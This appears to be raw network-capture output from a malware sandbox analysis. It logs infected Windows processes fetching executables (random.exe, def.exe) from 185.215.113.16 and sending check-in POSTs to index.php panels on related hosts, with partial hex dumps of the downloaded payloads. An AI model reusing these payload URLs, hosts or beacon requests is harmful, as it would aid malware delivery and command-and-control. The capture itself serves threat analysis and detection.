Nov 10, 2024 04:56:36.678524017 CET	210	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:56:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	50152	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:36.267920971 CET	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Sun, 10 Nov 2024 03:45:33 GMT If-None-Match: "67302c5d-1b0000"
Nov 10, 2024 04:56:37.171525955 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:37 GMT Last-Modified: Sun, 10 Nov 2024 03:45:33 GMT Connection: keep-alive ETag: "67302c5d-1b0000"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50155	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:38.966000080 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 32 31 39 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005219031&unit=246122658369
Nov 10, 2024 04:56:39.893626928 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50156	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:39.917654037 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 10, 2024 04:56:40.838987112 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:40 GMT Content-Type: application/octet-stream Content-Length: 2825728 Last-Modified: Sun, 10 Nov 2024 03:14:48 GMT Connection: keep-alive ETag: "67302528-2b1e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 a5 d6 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ ++`Ui` @ @.rsrc`2@.idata 8@rhdvqhbi*:@ucfxntef `+@.taggant@+"*@
Nov 10, 2024 04:56:40.839004993 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:40.839015007 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:40.839020967 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:40.839030981 CET	848	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:40.839035988 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:40.839041948 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:40.839051962 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ^Q[jt\ZcUrEyE@@m`FU<'$*o[m
Nov 10, 2024 04:56:40.839062929 CET	1236	IN	Data Raw: 7a b1 6c 2c 06 7d fb de 02 26 ae 96 47 5a 6d ba 43 09 8a 65 ec f8 9a d7 29 c4 74 9b aa 09 83 6c 33 f8 60 00 29 c6 44 22 2c aa 77 e8 72 c4 6e 97 ed 3f 2d 92 2b ad e7 60 84 4d 6a 53 2b 29 73 fa e6 f7 f2 57 ae df 9e 5d f5 09 49 df 5a 09 f3 28 2c 96 Data Ascii: zl,}&GZmCe)tl3`)D",wrn?-+`MjS+)sW]IZ(,wR~&9sI?<6PSg^h6'7NVRE.x~>"NTF@`BLsWqHHQpJsLo&d+T:k(<oC4H8nA[3EGL)rmRRp@-l
Nov 10, 2024 04:56:40.839076042 CET	848	IN	Data Raw: 32 e1 49 fb 8a cb 48 22 89 e4 42 85 34 43 4b fe a2 ba 81 10 69 e5 26 f2 9f e9 d5 5e 2c c3 4d f8 a5 70 fc f5 9e c5 59 9f 17 d6 a5 25 50 b4 cc fe 9b dd b7 3f 99 b8 71 28 67 88 24 fe 88 d2 2a e9 9e e2 45 d2 44 ca 9c 2f 03 e4 64 fb a2 b1 77 f2 95 fd Data Ascii: 2IH"B4CKi&^,MpY%P?q(g$*ED/dw rGh'bIoQ.Et#BrScLcE@ciKkmoKW'C18.z+\|8,zS_4:.[=VYlVTT8bSAcATwRzRl/\dMInK
Nov 10, 2024 04:56:40.844104052 CET	1236	IN	Data Raw: 40 ae b4 09 8b f7 eb a0 89 01 db 36 55 91 f7 43 7f d9 58 8d b5 ea 17 3e 27 7f df 1e 2e d6 ea 09 35 af 37 e9 a4 e5 f3 1c 57 bd 17 0e ac 35 5e b7 ad c6 ee 2c 4a 1c 71 e2 8b 02 e7 f8 b9 e8 77 fd 58 66 6c ea a2 e1 53 35 3e 26 8b ff f6 fd 66 d9 3f b7 Data Ascii: @6UCX>'.57W5^,JqwXflS5>&f?)Lv<)Lyk>)Z;'mm0F1UPRbtk#<g:ov[bO1S<vy8YLM)Ta*\Wf!,z_:sYY_pRE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50157	185.215.113.16	80	8632	C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:40.439953089 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50158	185.215.113.16	80	8632	C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:40.735883951 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 10, 2024 04:56:41.631203890 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:41 GMT Content-Type: application/octet-stream Content-Length: 2825728 Last-Modified: Sun, 10 Nov 2024 03:14:50 GMT Connection: keep-alive ETag: "6730252a-2b1e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 a5 d6 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ ++`Ui` @ @.rsrc`2@.idata 8@rhdvqhbi*:@ucfxntef `+@.taggant@+"*@
Nov 10, 2024 04:56:41.631243944 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:41.631254911 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:41.631263971 CET	212	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:41.631336927 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:41.631354094 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:41.631366014 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:41.631377935 CET	636	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:41.631413937 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:41.631431103 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ^Q[jt\ZcUrEyE@@m`FU<'$o[m^Fj=lGreTJT&wzhr:[n0vq~Obq5Kt_;j2PQr&Ny1kS<b52CdV26_*lp
Nov 10, 2024 04:56:41.636307955 CET	1236	IN	Data Raw: d6 d3 68 36 85 27 37 4e 56 52 d5 45 11 a8 13 2e 10 1f 78 7e 3e 22 4e 54 46 c7 99 94 40 f9 7f 60 42 4c 73 dd 57 0a 71 48 9f 02 e8 07 48 0b 51 ea a9 d1 70 de 4a ab 73 4c 6f ca 9a f5 ab ba 26 d6 64 15 2b 54 3a ad f7 fb ff fe 6b a4 28 3c 9d 11 d0 6f Data Ascii: h6'7NVRE.x~>"NTF@`BLsWqHHQpJsLo&d+T:k(<oC4H8nA[3EGL)rmRRp@-lUcUT(`9nL4(U}u4MUGr6Ze}0Z**qzx4]fnUF)StwB^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50161	185.215.113.209	80	6424	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:44.621201992 CET	157	OUT	POST /Fru7Nk9/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.209 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Nov 10, 2024 04:56:45.537082911 CET	719	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 39 64 33 66 64 38 30 32 31 38 32 64 63 31 35 61 33 34 61 31 39 37 62 36 66 63 64 34 36 61 62 39 38 65 36 30 30 63 62 64 61 65 36 64 33 64 35 33 39 34 39 38 66 31 30 32 35 61 62 38 37 61 65 37 30 32 37 31 30 30 39 32 31 66 65 37 61 36 36 61 64 66 35 66 2d 31 2d 5f 32 5f 63 66 32 34 64 31 34 61 32 65 37 32 38 66 36 39 36 36 66 62 63 34 66 64 62 61 63 36 33 65 38 38 64 38 33 39 35 39 66 62 66 65 36 30 34 64 30 64 64 38 39 32 66 31 33 33 35 63 65 63 32 64 39 33 35 33 32 33 35 33 63 39 35 38 62 32 64 30 36 36 64 38 32 63 2d 32 2d 5f 33 5f 62 33 33 38 62 30 30 30 31 62 31 36 63 39 31 61 36 64 61 32 61 35 66 66 64 36 65 39 34 35 39 39 39 65 33 35 30 32 61 64 61 62 36 32 37 64 30 30 38 62 64 39 38 31 33 34 30 36 62 33 37 35 65 36 32 66 33 34 2d 33 2d 5f 34 5f 62 62 31 65 38 33 30 39 30 64 32 37 64 32 31 66 37 36 61 34 39 63 38 30 64 64 63 35 35 65 38 61 61 31 30 61 30 66 38 32 63 64 32 32 35 32 30 30 39 64 63 31 61 36 33 62 31 37 39 37 35 61 62 36 30 39 32 34 2d 34 2d 5f [TRUNCATED] Data Ascii: 210 +++_1_9d3fd802182dc15a34a197b6fcd46ab98e600cbdae6d3d539498f1025ab87ae7027100921fe7a66adf5f-1-_2_cf24d14a2e728f6966fbc4fdbac63e88d83959fbfe604d0dd892f1335cec2d93532353c958b2d066d82c-2-_3_b338b0001b16c91a6da2a5ffd6e945999e3502adab627d008bd9813406b375e62f34-3-_4_bb1e83090d27d21f76a49c80ddc55e8aa10a0f82cd2252009dc1a63b17975ab60924-4-_5_cb6e9311310c8e4379abc0a5c8f445fa85202ea2cd644c67acdd8c1d29802fad530917bf35e9df7fbb222d5a864a590c4cb89946377e3495e61b5cee99c1e7e2f3acbb7efa33ae2709267151cf0cd6291f8143482349f9acf21b3d784e272d-5-0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50162	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:44.751987934 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 32 32 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005220001&unit=246122658369
Nov 10, 2024 04:56:45.674830914 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50164	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:47.342077971 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:56:48.243438005 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50166	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:49.763717890 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:56:50.702395916 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50172	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:52.312181950 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:56:53.219372034 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50180	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:54.754097939 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:56:55.656174898 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50193	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:57.347909927 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:56:58.255697012 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50216	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:59.951879978 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:57:00.859065056 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50223	185.215.113.16	80	7720	C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:00.253082037 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
